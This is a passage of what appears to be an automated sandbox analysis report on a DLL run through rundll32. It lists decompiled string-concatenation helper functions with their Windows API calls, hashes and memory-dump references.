                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                • String ID:
                • API String ID: 3767559652-0
                • Opcode ID: 719081c3c43455212ba3d0c3310f51dd61d41b9bbeba2e31393e64e2de9eab04
                • Instruction ID: e00d4feaf45f8ff23a298900fbd46d595631deda919c2d43d45a09530a373026
                • Opcode Fuzzy Hash: 719081c3c43455212ba3d0c3310f51dd61d41b9bbeba2e31393e64e2de9eab04
                • Instruction Fuzzy Hash: 3421CD72500225FBDF625F79C854AAABFE8EF46394F1580A4F8059B305DB35ED01C7A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B917A4 Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B917A4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04B96601(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                0x04b917b9
                0x04b917bd
                0x04b917c7
                0x04b917cc
                0x04b917d1
                0x04b917d3
                0x04b917db
                0x04b917e0
                0x04b917ee
                0x04b917f3
                0x04b917fd

                APIs
                • lstrlenW.KERNEL32(004F0053,?,74655520,00000008,051093CC,?,04B94281,004F0053,051093CC,?,?,?,?,?,?,04B91939), ref: 04B917B4
                • lstrlenW.KERNEL32(04B94281,?,04B94281,004F0053,051093CC,?,?,?,?,?,?,04B91939), ref: 04B917BB
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • memcpy.NTDLL(00000000,004F0053,746569A0,?,?,04B94281,004F0053,051093CC,?,?,?,?,?,?,04B91939), ref: 04B917DB
                • memcpy.NTDLL(746569A0,04B94281,00000002,00000000,004F0053,746569A0,?,?,04B94281,004F0053,051093CC), ref: 04B917EE
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: lstrlenmemcpy$AllocateHeap
                • String ID:
                • API String ID: 2411391700-0
                • Opcode ID: b8a4014affcbb1831d2675abf3e9fe909f61241f59f42d985f6bc5d766095edf
                • Instruction ID: 523ee925a56392757ffc241d82b7402fcdcaeaae753e33065cd54b46b0f9c9ba
                • Opcode Fuzzy Hash: b8a4014affcbb1831d2675abf3e9fe909f61241f59f42d985f6bc5d766095edf
                • Instruction Fuzzy Hash: A3F0F976900119FB9F11EFA9CC84CDF7BECEF0925871540A6F904D7201EA35EE159BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B927B3 Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(05109CE0,00000000,00000000,00000000,04B96E08,00000000), ref: 04B927C3
                • lstrlen.KERNEL32(?), ref: 04B927CB
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • lstrcpy.KERNEL32(00000000,05109CE0), ref: 04B927DF
                • lstrcat.KERNEL32(00000000,?), ref: 04B927EA
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                • String ID:
                • API String ID: 74227042-0
                • Opcode ID: 1211257400ba9433c2484ac661568781edc148e392e0dc652fdba00a5a097a35
                • Instruction ID: 5ca2252abc526f9fa249061bfab41873f684fcac9d4ee8f909205c9c060fab90
                • Opcode Fuzzy Hash: 1211257400ba9433c2484ac661568781edc148e392e0dc652fdba00a5a097a35
                • Instruction Fuzzy Hash: 88E06D73901621B78B115AB8AC48C9BBBADEF8A650304046BF600D3210CB29AC118BB1
                Uniqueness

                Uniqueness Score: -1.00%